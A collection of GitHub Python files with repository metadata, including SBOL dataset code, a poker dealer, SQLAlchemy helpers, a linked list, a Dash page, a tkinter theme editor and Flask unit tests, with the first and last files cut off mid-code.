ids.roles.cds,\n ids.roles.terminator,\n ids.roles.igem_promoter,\n ids.roles.igem_rbs,\n ids.roles.igem_cds,\n ids.roles.igem_terminator,\n ids.roles.igem_protein]\n # IGEM -> SBH has some components as annotations \n # which should be components. They have roles such as CDS.\n instance_count = 0\n for c in graph.get_components(subject):\n c_def = graph.get_definition(c)\n roles = graph.get_roles(c_def)\n if len(list(set(roles) & set(component_roles))) > 0:\n instance_count += 1\n if instance_count > 1:\n return True\n \n for sa in graph.get_sequence_annotations(subject):\n roles = graph.get_roles(sa)\n if len(list(set(roles) & set(component_roles))) > 0:\n instance_count += 1\n if instance_count > 1:\n return True\n return False\n \n\n def _replace(self,graph,i,p_part,fc,cts,role):\n a_parts = graph.get_participants(interaction=i)\n a_parts.remove(p_part)\n assert(len(a_parts) == 1)\n a_parts = a_parts[0]\n assert(role in cts)\n for entity in cts[role]:\n name = self._get_name(entity)\n if name in p_part:\n replacement = entity\n break\n else:\n raise ValueError()\n #replacement = cts[_get_input(str,cts[role])]\n md = graph.get_module_definition(interaction=i)\n fc_n = graph.create_fc_name(md,replacement)\n graph.add_functional_component(fc_n,replacement,md)\n graph.replace_triple((p_part,ids.predicates.participant,fc),\n (p_part,ids.predicates.participant,fc_n))\n return graph\n \n\n def _role_intersection(self,r1s,r2s):\n if len(r1s) > 0 and len(r2s) > 0 and len(list(set(r1s) & set(r2s))) == 0:\n return True\n return False\n \n\n def _get_name(self,subject):\n split_subject = _split(subject)\n if len(split_subject[-1]) == 1 and split_subject[-1].isdigit():\n return split_subject[-2]\n elif len(split_subject[-1]) == 3 and _isfloat(split_subject[-1]):\n return split_subject[-2]\n else:\n return split_subject[-1]\n\n\ndef _split(uri):\n return re.split('#|\\/|:', uri)\n\n\ndef _isfloat(x):\n try:\n float(x)\n return True\n except ValueError:\n return False","repo_name":"intbio-ncl/genet2","sub_path":"app/enhancer/seeder/datasets/abstract_dataset.py","file_name":"abstract_dataset.py","file_ext":"py","file_size_in_byte":12247,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"42967568369","text":"import random\n\ncards = ['2:', '3:', '4:', '5:', '6:', '7:', '8:', '9:', '10:', 'J:', 'Q:', 'K:', 'A:']\nsuites = ['♥', '♠', '♣', '♦']\ncard_stack = []\ndesk = {}\nhand = {}\n\ndef cards_defined():\n\n def random_card():\n random_card = random.choice(cards) + random.choice(suites)\n return random_card\n\n def duplicate_check(arg_list):\n for element in arg_list:\n if element == element:\n arg_list.remove(element)\n card_stack.append(random_card())\n\n for _ in range(7):\n card_stack.append(random_card())\n duplicate_check(card_stack)\n\n #desk.extend(card_stack[0:5])\n #hand.extend(card_stack[5:7])\n\n\n\n\ndef cards_choose(call):\n if 'init_flop' in call:\n return card_stack[0:3]\n elif 'init_turn' in call:\n return card_stack[3]\n elif 'init_river' in call:\n return card_stack[4]\n elif 'give_hand' in call:\n return card_stack[5:7]\n\n\n\ncards_defined()\n\ndef combination_check():\n pass\n\n\nprint(cards_choose('init_flop'))\nprint(cards_choose('init_turn'))\nprint(cards_choose('init_river'))\nprint(cards_choose('give_hand'))\n\n\n\n\n\n","repo_name":"beshu/PokerPython","sub_path":"combinations.py","file_name":"combinations.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29578346140","text":"from sqlalchemy import select, func\n\nfrom models import engine\nfrom models import user_table, User, operation_table, Operation, task_table\nfrom sqlalchemy.orm import sessionmaker\n\nSession = sessionmaker(bind=engine)\n\ndef create_user(login: str, password: str) -> User:\n user = User()\n user.login = login\n user.password = password\n return user\n\ndef create_operation(user_id: int, task_id: int, input: str, input_name: str, result: str, result_name: str) -> Operation:\n operation = Operation()\n operation.user_id = user_id\n operation.task_id = task_id\n operation.input = input\n operation.input_name = input_name\n operation.result = result\n operation.result_name = result_name\n return operation\n\ndef select_from_table(query):\n with engine.connect() as connection:\n return connection.execute(query)\n\ndef find_user_by_login(login:str):\n result = select_from_table(select(user_table).where(user_table.c.login == login))\n return [_ for _ in result]\n\ndef get_operation_number():\n result = select_from_table(select([func.count()]).select_from(operation_table))\n return [_ for _ in result][0][0]\n\ndef add_user(user: User):\n s = Session()\n s.bulk_save_objects([user])\n s.commit()\n with engine.connect() as connection:\n res = [n for n in connection.execute(user_table.select())]\n return res[-1][0]\n\ndef add_operation(operation: Operation):\n s = Session()\n s.bulk_save_objects([operation])\n s.commit()\n\ndef get_task_translate_by_id(task_id: int):\n result = select_from_table(select(task_table.c.name).where(task_table.c.id == task_id))\n return [_ for _ in result][0][0]\n\ndef select_operations_by_user(user):\n result = select_from_table(select(task_table.c.name, operation_table.c.input, operation_table.c.input_name,\n operation_table.c.result, operation_table.c.result_name)\n .join_from(operation_table, task_table, operation_table.c.task_id == task_table.c.id)\n .where(operation_table.c.user_id == user))\n return [_ for _ in result]","repo_name":"V31R/V31R.github.io","sub_path":"backend/server/database_api.py","file_name":"database_api.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9911317669","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport re\n\nfrom DataFixed import DataFixed\nfrom ConfidenceLevel import ConfidenceLevel\nfrom utils import StrUtil\n\nclass NameDataFixed(DataFixed):\n \"\"\"description of class\"\"\"\n\n def __init__(self):\n DataFixed.__init__(self, u'Name')\n self.__ErrorCount__ = 0\n self.__FixedCount__ = 0\n\n\n def __BeforeFixed__(self):\n logging.info(u'Start Fixed Name Data=================>\\n')\n\n\n def __FixedData__(self, resultJson):\n names = self.__ParseData__(resultJson)\n if len(names) == 0:\n logging.info(u'Name Data Error')\n return ConfidenceLevel.Bad, ''\n\n logging.info(names[0] + u' Fixed To ')\n \n confidencelevel, name = self.__FixedNameData__(names)\n\n logging.info(name)\n\n return confidencelevel, name\n\n\n def __FixedDataWithValidate__(self, resultJson, validateJson):\n name_list = self.__ParseData__(resultJson)\n validated_name_list = self.__ParseData__(validateJson)\n\n if len(validated_name_list) == 0 or len(name_list) == 0 or not self.__CheckData__(validated_name_list[0]):\n logging.info(u'Validated Data Error')\n return\n\n if validated_name_list[0] != name_list[0]:\n self.__ErrorCount__ += 1\n else:\n logging.info(u'Validated Equal To Result')\n return\n\n logging.info(u'Validated Not Equal To Result')\n logging.info(name_list[0] + u' Fixed To ')\n \n confidencelevel, checkcode, checkcodecandidates = self.__CheckData__(name_list)\n\n logging.info(checkcode)\n\n if validated_name_list[0] == checkcode:\n self.__FixedCount__ += 1\n logging.info(u'Fixed Success!')\n else:\n logging.info(u'Validated ' + validated_name_list[0])\n logging.info(u'Fixed Falied!')\n\n\n def __AfterFixed__(self):\n logging.info(u'Error Count ' + str(self.__ErrorCount__) + u', Fixed Count ' + str(self.__FixedCount__))\n\n logging.info(u'\\n<=================End Fixed Name Data')\n\n\n def __ParseData__(self, jsondata):\n names = []\n if jsondata == None or not isinstance(jsondata, dict) or jsondata[u'regions0'] == None:\n return names\n\n regions = jsondata[u'regions0']\n regions = sorted(regions, key=lambda region: region[u'confidence'], reverse = True)\n\n for region in regions:\n if region[u'cls'] == None or region[u'result'] == None:\n continue\n\n cls = region[u'cls']\n if cls == 23:\n for result in region[u'result']:\n names.append(result)\n\n for result in region[u'ref_result']:\n names.append(result)\n\n return names\n\n\n def __CheckData__(self, name):\n if len(name) < 2:\n return False\n\n for ch in name:\n if ch in self.__LetterPatterns__:\n return False\n\n if ch in self.__NumberPatterns__:\n return False\n\n return True\n\n\n def __FixedNameData__(self, name_list):\n for name in name_list:\n if self.__CheckData__(name):\n return ConfidenceLevel.Bad, name\n\n return ConfidenceLevel.Bad, name_list[0]\n","repo_name":"killvxk/Sugar","sub_path":"DataFixed/Python/Receipt/Domestic/Air/NameDataFixed.py","file_name":"NameDataFixed.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28081350380","text":"#!python\n\nfrom __future__ import print_function\n\n\nclass Node(object):\n\n def __init__(self, data):\n \"\"\"Initialize this node with the given data\"\"\"\n self.data = data\n self.next = None\n\n\n def __repr__(self):\n \"\"\"Return a string representation of this node\"\"\"\n return 'Node({})'.format(repr(self.data))\n\n def getData(self):\n return self.data\n\n\n def getNext(self):\n return self.next\n\n\n def setData(self,newdata):\n self.data = newdata\n\n\n def setNext(self,newnext):\n self.next = newnext\n\nclass LinkedList(object):\n\n def __init__(self, iterable=None):\n \"\"\"Initialize this linked list; append the given items, if any\"\"\"\n self.head = None\n self.tail = None\n if iterable:\n for item in iterable:\n self.append(item)\n\n def __repr__(self):\n \"\"\"Return a string representation of this linked list\"\"\"\n return 'LinkedList({})'.format(self.as_list())\n\n def as_list(self):\n \"\"\"Return a list of all items in this linked list\"\"\"\n result = []\n current = self.head\n while current is not None:\n result.append(current.data)\n # result.append(current)\n current = current.next\n return result\n\n def is_empty(self):\n \"\"\"Return True if this linked list is empty, or False\"\"\"\n return self.head is None\n\n def length(self):\n \"\"\"Return the length of this linked list by traversing its nodes\"\"\"\n #set a counter\n myint = 0\n #create a pointer that points to head\n firstNode = self.head\n #while the firstNode has a value add +1 to the counter\n while firstNode is not None:\n myint+=1\n firstNode = firstNode.next\n return myint\n\n\n\n\n def append(self, item):\n \"\"\"Insert the given item at the tail of this linked list\"\"\"\n #create a new node\n newNode = Node(item)\n #find node at tail\n #point from that last node in tail to new node\n if self.tail == None :\n self.tail = newNode\n self.head = newNode\n return\n\n self.tail.next = newNode\n #point tail to newNode\n self.tail = newNode\n\n def prepend(self, item):\n \"\"\"Insert the given item at the head of this linked list\"\"\"\n nodeNew = Node(item)\n\n if self.head == None:\n self.head = nodeNew\n self.tail = nodeNew\n return\n\n self.head.next = nodeNew\n self.head = nodeNew\n\n\n\n def delete(self, item):\n \"\"\"Delete the given item from this linked list, or raise ValueError\"\"\"\n current = self.head\n previous = None\n\n while current is not None:\n if current.getData() == item:\n if self.head == current:\n self.head = current.next\n if self.tail == current:\n self.tail = previous\n if previous:\n previous.next = current.next\n return\n previous = current\n current = current.next\n\n raise ValueError('Item not found: {}'.format(item))\n\n def find(self, quality):\n \"\"\"Return an item from this linked list satisfying the given quality\"\"\"\n #TODO: find item where quality(item) is True\n current = self.head\n\n while current:\n if quality(current.data):\n return current.data\n else:\n current = current.next\n if current is None:\n\n return None\n\n\n\ndef test_linked_list():\n ll = LinkedList()\n print(ll)\n ll.append('A')\n print(ll)\n ll.append('B')\n print(ll)\n ll.append('C')\n print(ll)\n print('head: ' + str(ll.head))\n print('tail: ' + str(ll.tail))\n print(ll.length())\n ll.delete('A')\n print(ll)\n ll.delete('C')\n print(ll)\n ll.delete('B')\n print(ll)\n print('head: ' + str(ll.head))\n print('tail: ' + str(ll.tail))\n print(ll.length())\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n test_linked_list()\n","repo_name":"MakeSchool-18/Linked-List-Nkdream","sub_path":"linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":4107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25705596088","text":"import dash\nimport dash_bootstrap_components as dbc\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport plotly.graph_objs as go\nimport matplotlib.pyplot as plt\nfrom plotly.tools import mpl_to_plotly\n\nfrom app import app\n\n\ncolumn1 = dbc.Col(\n [\n # dcc.Markdown(\n # \"\"\"\n \n # ## Predictions\n\n\n # \"\"\"\n # ),\n # html.H6('Model Selection'),\n # dcc.Dropdown(\n # id='model',\n # # value=5,\n # options=[{'label': i, 'value' : i} for i in ['Random Forest','XG Boost']], \n # ),\n # html.Div(id='test',children='output will go here'), \n # html.Br(),\n # html.H6('Year of Release'),\n # dcc.Dropdown(\n # id='year-drop',\n # value=1960,\n # options=[{'label': i, 'value' : i} for i in [i for i in range(1960,2019)]], \n # ),\n html.Br(),\n html.Br(),\n html.H6('US Popularity Level'),\n dcc.Slider(\n id='slider-1',\n min=90,\n max=100,\n value= 45,\n step=.1,\n# marks={i:str(i) for i in range(90,101)},\n \n ),\n html.H6('Beat Strength'),\n dcc.Slider(\n id='slider-2',\n min=.01,\n max=1,\n step=.01,\n value = .5,\n# marks={i:str(i) for i in range(1,11)},\n \n ),\n html.H6('Bounciness'),\n dcc.Slider(\n id='slider-3',\n min=.01,\n max=1,\n step=.01,\n value = .5,\n# marks={i:str(i) for i in range(1,11)},\n \n ),\n html.H6('Danceability'),\n dcc.Slider(\n id='slider-4',\n min=0.01,\n max=1,\n step=0.01,\n value = .5,\n# marks={i:str(i) for i in range(0,2)},\n \n ),\n html.H6('Dynamic Range'),\n dcc.Slider(\n id='slider-5',\n min=0.01,\n max=38,\n step=0.01,\n value = 19,\n# marks={i:str(i) for i in range(0,39)},\n \n ),\n html.H6('Energy'),\n dcc.Slider(\n id='slider-6',\n min=0.01,\n max=1,\n step=0.01,\n value = .5,\n# marks={i:str(i) for i in range(1,11)},\n \n ),\n html.H6('Instrumentalness'),\n dcc.Slider(\n id='slider-7',\n min=0.01,\n max=1,\n step=0.01,\n value = .5,\n# marks={i:str(i) for i in range(0,1)},\n \n ),\n html.H6('Mechanism'),\n dcc.Slider(\n id='slider-8',\n min=0.01,\n max=1,\n step=0.01,\n value = .5,\n# marks={i:str(i) for i in range(1,9)},\n \n ),\n html.H6('Organism'),\n dcc.Slider(\n id='slider-9',\n min=0.01,\n max=1,\n step=0.01,\n value = .5,\n# marks={i:str(i) for i in range(1,9)},\n \n ),\n html.H6('Speechiness'),\n dcc.Slider(\n id='slider-10',\n min=0.1,\n max=1,\n step=0.01,\n value = .5,\n# marks={i:str(i) for i in range(1,9)},\n \n ),\n html.H6('Tempo'),\n dcc.Slider(\n id='slider-11',\n min=60,\n max=240,\n step=5,\n value = 92,\n marks={i:str(i) for i in range(60,241,20)},\n \n ),\n html.Br(),\n html.Br(),\n html.H6('Year of Release'),\n dcc.Slider(\n id='slider-0',\n min=1960,\n max=2020,\n step=1,\n value = 1990,\n marks={i:str(i) for i in range(1960,2021,10)},\n \n ),\n \n \n html.Br(),\n html.Br(),\n html.Br(),\n \n ],\n md=4,\n)\n\n# matplotlib_figure = plt.figure()\n# x = [10, 8, 13, 9, 11, 14, 6, 4, 12, 7, 5]\n# y = [ 8, 6, 7, 8, 8, 9, 7, 4, 10, 4, 5]\n# plt.scatter(x, y)\n# plotly_figure = mpl_to_plotly(matplotlib_figure)\n\n\ncolumn2 = dbc.Col(\n [ html.Br(),\n html.Div(id='prediction-text1',children='output will go here',style={'color': 'green', 'fontSize': 16}), \n html.Br(), \n html.Div(id='prediction-text2',children='output will go here',style={'fontSize': 16}),\n html.Br(), \n html.Div(id='prediction-text3',children='output will go here',style={'color': 'green', 'fontSize': 16}),\n html.Div(id='prediction-text4',children='output will go here',style={'color': 'green', 'fontSize': 16}), \n html.Div(id='prediction-text5',children='output will go here',style={'color': 'green', 'fontSize': 16}), \n html.Br(), \n html.Div(id='prediction-text6',children='output will go here',style={'fontSize': 16}), \n html.Div(id='prediction-text7',children='output will go here',style={'color': 'green', 'fontSize': 16}), \n \n ],\n md=3,\n \n)\n\ncolumn3 = dbc.Col(\n [\n # html.Div(id='prediction-text',children='output will go here'), \n dcc.Markdown(\n \"\"\"\n \n **Instructions**: Adjust the attribute sliders. Your prediction outcome will update dynamically. \n\n Attribute Definitions:\n\n * **US Popularity Level** - Highest point on Billboard \n * **Beat Strength** - The energy level at beat intervals\n * **Bounciness** - Length of decay of initial beat\n * **Danceability** - Danceability describes how suitable a track is for dancing based on a combination of musical elements including tempo, rhythm stability, beat strength, and overall regularity. A value of 0.0 is least danceable and 1.0 is most danceable. \n * **Dynamic Range** - The volumne difference between the loudest and quietest parts of the track\n * **Energy** - Energy is a measure from 0.0 to 1.0 and represents a perceptual measure of intensity and activity.\n * **Instrumentalness** - Predicts whether a track contains no vocals. The closer the instrumentalness value is to 1.0, the greater likelihood the track contains no vocal content.\n * **Mechanism** - Whether a song sticks rigidly to a click track or drum machine, or is more organic and \"tempo-wandering\"\n * **Organism** - Organism is how human a track sounds, using a live drummer rather than a drum machine for example.\n * **Speechiness** - Speechiness detects the presence of spoken words in a track. The more exclusively speech-like the recording (e.g. talk show, audio book, poetry), the closer to 1.0 the attribute value. \n * **Tempo** - The overall estimated tempo of a track in beats per minute (BPM). In musical terminology, tempo is the speed or pace of a given piece and derives directly from the average beat duration. \n * **Year of Release** - Year the track was released \n\n\n\n\n \"\"\"\n ),\n # html.Div(id='shapley',children='output will go here'),\n# dcc.Graph(id='my-graph-name', figure=plotly_figure)\n \n ]\n \n)\n\nlayout = dbc.Row([column1, column2, column3]) \n\n ","repo_name":"zwarshavsky/spotify-playlist-skipping-predictions","sub_path":"pages/predictions.py","file_name":"predictions.py","file_ext":"py","file_size_in_byte":7346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27144829572","text":"l1 = [1, 3, 5, 7, 9] # list mutable (read write)\nt1 = (1, 3, 5, 7, 9) # tuple imutable (read only)\n\n\ndef f(x):\n x.append(29)\n\nf(l1)\nprint(l1)\nf(t1)\nprint(t1)","repo_name":"decagondev/CS35_IntroPython_GP","sub_path":"day2/tuples.py","file_name":"tuples.py","file_ext":"py","file_size_in_byte":161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"75020896551","text":"'''Kaprekar'''\n\n\ndef reorder(num):\n '''reorder Cr. jarukit'''\n num_a, num_b, num_c, num_d = int(num[0]), int(\n num[1]), int(num[2]), int(num[3])\n if num_a > num_b:\n num_a, num_b = num_b, num_a\n if num_c > num_d:\n num_c, num_d = num_d, num_c\n if num_a > num_c:\n num_a, num_c = num_c, num_a\n if num_b > num_d:\n num_b, num_d = num_d, num_b\n if num_b > num_c:\n num_b, num_c = num_c, num_b\n return str(num_a), str(num_b), str(num_c), str(num_d)\n\n\ndef kaprekar(num):\n '''More like paprika'''\n count = 0\n result = 0\n nnum = reorder(num)\n while result != 6174:\n lowest = int(nnum[0]+nnum[1]+nnum[2]+nnum[3])\n highest = int(nnum[3]+nnum[2]+nnum[1]+nnum[0])\n result = highest-lowest\n nnum = reorder(str(result).zfill(4))\n count += 1\n print(count)\n\n\nkaprekar(input())\n","repo_name":"Maldin0/Python","sub_path":"099-Kaprekar.py","file_name":"099-Kaprekar.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42451631744","text":"import os\nimport tkinter\nimport json\nimport shutil\nfrom tkinter import colorchooser\nfrom tkinter import filedialog\n'''\nThis is the main file of the theme editor\n'''\n\n\nclass editor():\n '''\n This fuc is the main programme\n '''\n def readFile(name: str, startRow: int = 0, endRow: int = 1) -> str:\n '''\n @ name: The Name of the file\\n\n @ startRow: The row you want to start\\n\n @ endRow: The row you want to stop\\n\n This fuction is used to read a file.\n '''\n result = ''\n # open the file user want to read.\n with open(name, mode='r') as file:\n fileList = []\n fileList = file.readlines()\n if endRow > len(fileList):\n endRow = len(fileList)\n for index in range(0, endRow):\n if index >= startRow:\n result += fileList[index]\n continue\n return result\n\n def __init__(self) -> None:\n '''\n The fuc used to init the programme\n '''\n settings = json.loads(editor.readFile(\n \"./data/setting.json\", 0, 100))\n themePath = settings[\"themePath\"]\n self.uiSettings = json.loads(editor.readFile(\n f\"{themePath}/ui.json\", 0, 100))\n settings = json.loads(editor.readFile(\n \"./data/setting.json\", 0, 100))\n sourcePath = settings[\"themePath\"]\n self.sourceSettings = json.loads(editor.readFile(\n f\"{sourcePath}/sources.json\", 0, 100))\n\n def color_callback() -> str:\n '''\n This fuction returns a color value\n '''\n colorValue = colorchooser.askcolor(title=\"Choose color\")[1]\n return colorValue if colorValue != None else [0, 0, 0]\n\n def fontSize_Callback(self):\n self.sourceSettings['fontSize'] = self.ent.get()\n\n def callback(self, settingName) -> None:\n ''''\n The Call back of button_playerWig\n '''\n if settingName in self.uiSettings:\n self.uiSettings[settingName] = editor.color_callback()\n if settingName in self.sourceSettings:\n if settingName != 'fontSize':\n self.sourceSettings[settingName] = filedialog.askopenfile()\n else:\n window = tkinter.Tk()\n window.title = 'FontSize'\n self.ent = tkinter.Entry(window, relief=\"flat\")\n self.ent.pack(fill=\"x\")\n tkinter.Button(window, relief=\"flat\", text=\"OK\",\n command=lambda: editor.fontSize_Callback(self)).pack(fill=\"x\")\n tkinter.mainloop()\n\n def saveAs(self):\n \"\"\"\n This fuc is used to store the configs \n \"\"\"\n os.makedirs(self.themeName)\n shutil.copytree(\"./\"+self.themeName, './themes')\n with open(\"ui.json\", mode='a+') as ui:\n uiJSon = json.dumps(self.uiSettings)\n ui.write(uiJSon)\n with open(\"sources.json\") as sources:\n sourceJson = json.dumps(self.sourceSettings)\n sources.write(sourceJson)\n shutil.copyfile(\"ui.json\",f\"./themes/{self.themeName}\")\n shutil.copyfile(\"sources.json\",f\"./themes/{self.themeName}\")\n for path in self.sourceSettings:\n shutil.copyfile(path,f\"./themes/{self.themeName}\")\n quit()\n def set_themeName(self):\n self.themeName = self.entry.get()\n\n def main(self):\n '''\n main Programme\n '''\n\n self.themeName = \"New Theme\"\n window = tkinter.Tk()\n window.title(\"Theme Editor\")\n tkinter.Label(window, text=\"--=Plane War Theme Editor=--\",\n height=3,).pack(fill='x')\n listFrame = tkinter.Frame()\n listBox = tkinter.Listbox(listFrame, relief=\"flat\", height=18, width=100, foreground=\"#aaaaaa\",\n highlightcolor=\"#0A59f7\", highlightbackground=\"#f1f3f5\", selectbackground=\"#0A59f7\", selectforeground=\"#ffffff\")\n for key in self.uiSettings:\n listBox.insert(\"end\", key,)\n for key in self.sourceSettings:\n listBox.insert(\"end\", key,)\n listBox.pack(fill='both')\n tkinter.Button(listFrame, text='Change', relief='flat', highlightcolor=\"#0A59F7\",\n command=lambda: editor.callback(self, listBox.get(\"active\"))).pack(fill=\"x\")\n tkinter.Button(listFrame, text='Output Into File', relief='flat',\n command=lambda: editor.saveAs(self)).pack(fill=\"x\")\n tkinter.Label(window, text=\"Theme Name?\").pack()\n self.entry = tkinter.Entry(window, bg=\"#ffffff\").pack()\n tkinter.Button(window, relief=\"flat\", border=0, text=\"\").pack()\n listFrame.pack(fill='x')\n tkinter.mainloop()\n\n\nif __name__ == \"__main__\":\n self = editor()\n editor.main(self)\n","repo_name":"HQYSteven/PlaneWar","sub_path":"py/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":4821,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70471264233","text":"# -*- coding = utf-8 -*-\n# @Time : 2021/4/20 15:56\n# @Author : Hermit \n# @Fill : test.py\n# @software : PyCharm\nimport os\nimport subprocess\nimport DBOperation\nimport sqlite3\n# -641.0068\n# -143.3987\n# 0.1379\n# feed rate:0mm/min\n# spindle speed: 0degree\n# spindle load: 0\n\ndef testReadData(DBPath):\n order = r\".\\readdata\\Test.exe\"\n pi = subprocess.Popen(order, shell=True, stdout=subprocess.PIPE)\n index = 0\n mcData = []# x y z fr sps spl v设为0\n try:\n for i in iter(pi.stdout.readline, 'b'):\n item = i.decode('gbk') # 编码问题\n item = item[:-2] # 去掉\\r\\n\n mcData.append(item)\n if item =='':\n print(mcData)\n DBOperation.saveData(DBPath, mcData[5], mcData[4], str(0), mcData[0], mcData[1], mcData[2], mcData[3])\n mcData = []\n except ValueError as e:\n print(str(e))\n\ndef readData(dbpath):\n cor = []# 坐标列表\n cors = []\n sql ='''\n select cutterpos_x,cutterpos_y,cutterpos_z from MachineData\n order by timestamp desc limit 800\n '''\n conn = sqlite3.connect(dbpath) # 连接 有数据库就连接 没有就创建\n cursor = conn.cursor() # 获取游标\n cursor.execute(sql) # 执行SQL语句\n for row in cursor:\n cor.append(row[0])\n cor.append(row[1])\n cor.append(row[2])\n if len(cor)==3:\n cors.append(cor)\n cor =[]\n conn.commit() # 结束数据库事务\n conn.close() # 关闭连接\n return cors\n\n\nDBPath = \"Machine.db\"\nprint(readData(DBPath))","repo_name":"Hermit-Alex/WebPage","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1186135977","text":"file = open('input2.txt')\r\n\r\nlines = file.readlines()\r\n\r\nfile.close()\r\n\r\ndistance = 0\r\ndepth = 0\r\naim = 0\r\n\r\nfor raw_line in lines:\r\n line = raw_line.strip('\\n')\r\n val = int(line[-1])\r\n\r\n if line[0] == 'f':\r\n distance += val\r\n depth += val * aim\r\n if line[0] == 'd':\r\n aim += val\r\n if line[0] == 'u':\r\n aim -= val\r\n\r\nprint(depth * distance)","repo_name":"benfried129/Advent-of-Code","sub_path":"Day-2/d2p2.py","file_name":"d2p2.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44154614257","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n9 (9) As a car owner I want to choose a service(common, plus, premium) So that my car needs to fix\n\"\"\"\n\nimport json\nimport unittest\n\n\nfrom app import db, app\nfrom config import DataBaseConfig\nfrom persistence.database.entity.service_grade import ServiceGrade\nfrom persistence.database.entity.user.user import User\nfrom routers.admin import admin\nfrom routers.authintication import authentication\nfrom routers.car_owner import car_owner\nfrom routers.choose_services import choose_service_grade\nfrom routers.index import index_route\nfrom test_cases.fill_db import init_db\n\n\nclass RegistersTest(unittest.TestCase):\n # executed prior to each test\n def setUp(self):\n app.config['TESTING'] = True\n app.config['WTF_CSRF_ENABLED'] = False\n app.config['DEBUG'] = False\n app.config[\n 'SQLALCHEMY_DATABASE_URI'] = DataBaseConfig.DB_DIALECT + DataBaseConfig.USER_NAME + ':' + DataBaseConfig.PASSWORD + '@' + DataBaseConfig.SERVER_ADDRESS + ':' + DataBaseConfig.PORT + '/' + DataBaseConfig.DATABASE_NAME\n app.register_blueprint(index_route)\n app.register_blueprint(car_owner)\n app.register_blueprint(authentication)\n app.register_blueprint(admin)\n app.register_blueprint(choose_service_grade)\n\n self.app = app.test_client()\n\n # db.drop_all()\n init_db()\n\n # Disable sending emails during unit testing\n # self.assertEqual(app.debug, False)\n\n # executed after each test\n def tearDown(self):\n pass\n\n @classmethod\n def setUpClass(cls):\n pass\n\n @classmethod\n def tearDownClass(cls):\n pass\n\n # success scenario\n\n def test_get_service_grade(self):\n list_returned = ServiceGrade.list_service_grades()\n list_returned1 = ServiceGrade.list_service_grades()\n self.assertEqual(list_returned[1], list_returned[1])\n\n def test_get_service_type_by_service_grade(self):\n list_returned = ServiceGrade.list_service_types(1)\n # list_returned[1][0][0].service_types[0].name\n list_returned[1].dictionary_creator()\n self.assertEqual(list_returned[1], list_returned[1])\n\n def test_register_admin(self):\n data = {\n \"name\": \"امید\",\n \"last_name\": \"شعبانی\",\n \"password\": \"Amish147852\",\n \"phone_number\": \"09372943761\",\n \"user_type\": \"1\"\n }\n json_obj = json.dumps(data)\n\n with self.app as client:\n with client.session_transaction() as sess:\n sess['logged_in'] = True\n response = client.post('/register_admin', data=json_obj, content_type='application/json')\n print(response.data)\n datastore = json.loads(response.data)\n self.assertEqual(True, True)\n #\n\n data = {\n \"code\": User.query.filter(User.phone_number== \"09372943761\").first().code,\n \"phone_number\": \"09372943761\",\n }\n json_obj = json.dumps(data)\n\n response = client.post('/validate_user', content_type='application/json', data=json_obj)\n print(response.data)\n datastore = json.loads(response.data)\n self.assertEqual(True, True)\n #\n # data = {\n # \"car_owner_id\": \"1234\",\n # \"car_id\": \"1\",\n # }\n # json_obj = json.dumps(data)\n #\n # response = client.delete('/car_owner/cars/1', content_type='application/json', data=json_obj)\n # print(response.data)\n # datastore = json.loads(response.data)\n # self.assertEqual(True, True)\n #\n # data = {\n # \"car_owner_id\": \"1234\",\n # \"car_id\": \"1\",\n # }\n # json_obj = json.dumps(data)\n #\n # response = client.put('/car_owner/cars/1', content_type='application/json', data=json_obj)\n # print(response.data)\n # datastore = json.loads(response.data)\n # self.assertEqual(True, True)\n #\n # data = {\n # \"phone_number\": \"09125200492\",\n # \"name\": \"امید\",\n # \"password\": \"Amish1234\",\n # }\n # json_obj = json.dumps(data)\n #\n # response = client.post('/register/iws', content_type='application/json', data=json_obj)\n # print(response.data)\n # datastore = json.loads(response.data)\n # self.assertEqual(True, True)\n #\n # data = {\n # \"car_owner\": \"1\",\n # \"car_info\": {\"vin_number\": 'iRFC93R21SN497641', \"plate_number\": '79ط749-33', \"auto_type\": '1'}\n # }\n # json_obj = json.dumps(data)\n #\n # response = client.post('/car_owner/cars', content_type='application/json', data=json_obj)\n # print(response.data)\n # datastore = json.loads(response.data)\n # self.assertEqual(True, True)\n\n data = {\n \"name\": \"امیر\",\n \"password\": \"Amish1234\",\n \"phone_number\": \"09122341484\",\n \"reg_id\": \"1\",\n # \"user_type\": \"1\"\n }\n json_obj = json.dumps(data)\n\n response = client.post('/register_user', content_type='application/json', data=json_obj)\n print(response.data)\n datastore = json.loads(response.data)\n self.assertEqual(True, True)\n\n data = {\n \"phone_number\": \"09125200492\",\n \"name\": \"امید\",\n \"password\": \"Amish1234\",\n \"regId\": \"\",\n \"os\": \"\"\n }\n json_obj = json.dumps(data)\n\n response = client.post('/login', content_type='application/json', data=json_obj)\n print(response.data)\n datastore = json.loads(response.data)\n self.assertEqual(True, True)\n\n response = 